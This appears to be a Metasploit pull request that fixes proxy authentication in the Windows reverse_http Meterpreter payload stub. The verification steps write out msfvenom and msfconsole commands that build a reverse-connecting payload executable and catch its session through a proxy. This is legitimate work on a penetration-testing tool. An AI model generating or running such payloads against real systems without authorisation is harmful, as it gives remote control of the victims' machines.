### PR TITLE
Fix proxy authentication in reverse_http

### DIFF
--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -330,7 +330,7 @@ module Payload::Windows::ReverseHttp
                              ; LPVOID lpBuffer (password from previous call)
         push 44              ; DWORD dwOption (INTERNET_OPTION_PROXY_PASSWORD)
         push esi             ; hConnection
-        push #{Rex::Text.block_api_hash('wininet.dll', 'HttpAddRequestHeaders')}
+        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
         call ebp
       ^
     end


### PR DESCRIPTION
This fixes the error that windows/*/reverse_http(s) can not establish a connection via proxy with authentication.

## Verification

- [x] Setup proxy with authentication
- [x] `msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_http LHOST=<lhost> LPORT=<lport> HttpProxyHost=<proxy host> HttpProxyPort=<proxy port> HttpProxyUser=<proxy user> HttpProxyPass=<proxy password> -f exe > payload.exe`
- [x] Start `msfconsole`
- [x] `use exploit/multi/handler`
- [x] `set PAYLOAD windows/meterpreter/reverse_http`
- [x] `set LHOST <lhost>`
- [x] `set LPORT <lport>`
- [x] `set HttpProxyHost <proxy host>`
- [x] `set HttpProxyPort <proxy port>`
- [x] `set HttpProxyUser <proxy user>`
- [x] `set HttpProxyPass <proxy password>`
- [x] `set ExitOnSession false`
- [x] `run -j`
- [x] execute payload
- [x] Verify that the output does not contain any error messages